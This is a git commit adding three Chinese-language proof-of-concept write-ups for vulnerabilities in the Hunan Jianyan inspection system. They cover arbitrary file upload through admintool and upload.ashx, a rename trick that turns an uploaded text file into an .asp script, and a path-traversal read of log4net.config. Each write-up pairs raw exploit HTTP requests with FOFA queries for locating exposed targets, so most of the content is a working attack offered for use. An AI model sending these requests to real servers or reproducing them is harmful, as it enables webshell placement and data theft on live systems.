整理文件
This commit is contained in:
25
湖南建研检测系统/湖南建研-检测系统 admintool 任意文件上传.md
Normal file
25
湖南建研检测系统/湖南建研-检测系统 admintool 任意文件上传.md
Normal file
@@ -0,0 +1,25 @@
|
||||
## 湖南建研-检测系统 admintool 任意文件上传
|
||||
|
||||
|
||||
## fofa
|
||||
```
|
||||
body="/Content/Theme/Standard/webSite/login.css"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /Scripts/admintool?type=updatefile HTTP/1.1
|
||||
Host:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
|
||||
Content-Length: 41
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
|
||||
filePath=dmvckiil.aspx&fileContent=123123
|
||||
```
|
||||

|
||||
|
||||

|
||||
26
湖南建研检测系统/湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞.md
Normal file
26
湖南建研检测系统/湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞.md
Normal file
@@ -0,0 +1,26 @@
|
||||
## 湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞
|
||||
|
||||
湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞,导致系统被攻击与控制。
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
body="Login/QRLogin.ashx"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
POST /Common/DownLoad2.aspx HTTP/1.1
|
||||
Host: 地址
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 30
|
||||
|
||||
path=..%2Flog4net.config&Name=
|
||||
```
|
||||
|
||||

|
||||
45
湖南建研检测系统/湖南建研质量监测系统upload.ashx文件上传漏洞.md
Normal file
45
湖南建研检测系统/湖南建研质量监测系统upload.ashx文件上传漏洞.md
Normal file
@@ -0,0 +1,45 @@
|
||||
## 湖南建研质量监测系统upload.ashx文件上传漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
body="/Content/Theme/Standard/webSite/login.css"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /Applications/Attachment/upload.ashx HTTP/1.1
|
||||
Host:
|
||||
Content-Type: multipart/form-data; boundary=------------------------OqjxWFlqvSLEefGwXuWeIHbrMYnLtTbqoIUbHXbR
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Content-Length: 335
|
||||
|
||||
--------------------------OqjxWFlqvSLEefGwXuWeIHbrMYnLtTbqoIUbHXbR
|
||||
Content-Disposition: form-data; name="file";filename="123.txt"
|
||||
|
||||
123
|
||||
--------------------------OqjxWFlqvSLEefGwXuWeIHbrMYnLtTbqoIUbHXbR
|
||||
Content-Disposition: form-data; name="_upload_guid"
|
||||
123
|
||||
--------------------------OqjxWFlqvSLEefGwXuWeIHbrMYnLtTbqoIUbHXbR--
|
||||
```
|
||||
|
||||

|
||||
|
||||
### 将文件复制改名
|
||||
|
||||
```
|
||||
POST /Standard/Editor/API/File.cshtml?act=geturl HTTP/1.1
|
||||
Host:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||||
X-Forwarded-Proto:
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Content-Length: 63
|
||||
|
||||
filename=/tempData/12345667.asp&filetplpath=/tempData/123.txt
|
||||
```
|
||||
|
||||

|
||||
Reference in New Issue
Block a user